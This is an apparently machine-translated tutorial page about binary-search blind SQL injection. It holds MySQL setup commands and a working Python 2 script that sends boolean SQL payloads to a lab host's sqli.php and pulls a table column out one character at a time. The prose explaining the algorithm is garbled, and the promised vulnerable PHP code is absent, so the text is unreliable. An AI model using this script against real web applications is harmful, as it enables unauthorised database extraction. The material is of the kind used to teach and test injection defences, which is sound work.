Blind SQL Injection Using the binary method

Last Update:2013-11-20 Source: Internet

Author: User

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

General idea: 1. the mid value is the center value of left and right. If the mid value is equal to left, it is equal to 5. If the mid value is not equal to 22, the request mid value is returned. If the correct page is returned, it is jumped to 3, if the page with the returned error jumps to 43 and the returned page is correct, assign "right" to mid4, return the page error, and assign "left" to mid5. The returned mid value is still very fast, generally, a single character can be queried for requests within 10 times. Create a database table first

mysql> CREATE TABLE a(id INT,content  VARCHAR(20));Query OK, 0 rows affected (0.20 sec)       mysql> CREATE TABLE b(id INT,name VARCHAR(100));Query OK, 0 rows affected (0.03 sec) mysql> INSERT INTO a(id,content) VALUES(1,'test');Query OK, 1 row affected (0.34 sec)       mysql> INSERT INTO b(id,name) VALUES(1,'aaaaaaaaaabbbbbbbbbcccccccccddddddddddfffffggggggggggggggggg');Query OK, 1 row affected (0.03 sec)

Blind injection vulnerability php code

Use Code

#!/usr/bin/env python# -*- codeing:utf-8 -*-      import sys,urllib2from optparse import OptionParserfrom urllib2 import Request,urlopen,URLError,HTTPErrorimport urllib       def request(URL):    user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }    req = urllib2.Request(URL, None, user_agent)           try:        request = urllib2.urlopen(req)           except HTTPError, e:        print('[!] The server couldnt fulfill the request.')        print('[!] Error code: ' + str(e.code))        sys.exit(1)           except URLError, e:        print('[!] We failed to reach a server.')        print('[!] Reason: ' + str(e.reason))        sys.exit(1)           return request.read()      def binary_sqli(left, right, index):    host = '192.168.204.129'          while 1:        mid = (left + right)/2        if mid == left:            print chr(mid)            break        payload = '1 and ascii(substring((SELECT name from b),%s,1))<%s' % (str(index), mid)        param = {'sqli': payload}        html = request('http://'+host+'/sqli.php?'+urllib.urlencode(param))              if 'True' in html:            right = mid        else:            left = mid                  if __name__ == '__main__':    for i in range(1,50):        binary_sqli(35, 127, i)

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More

Blind SQL Injection Using the binary method

Contact Us

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support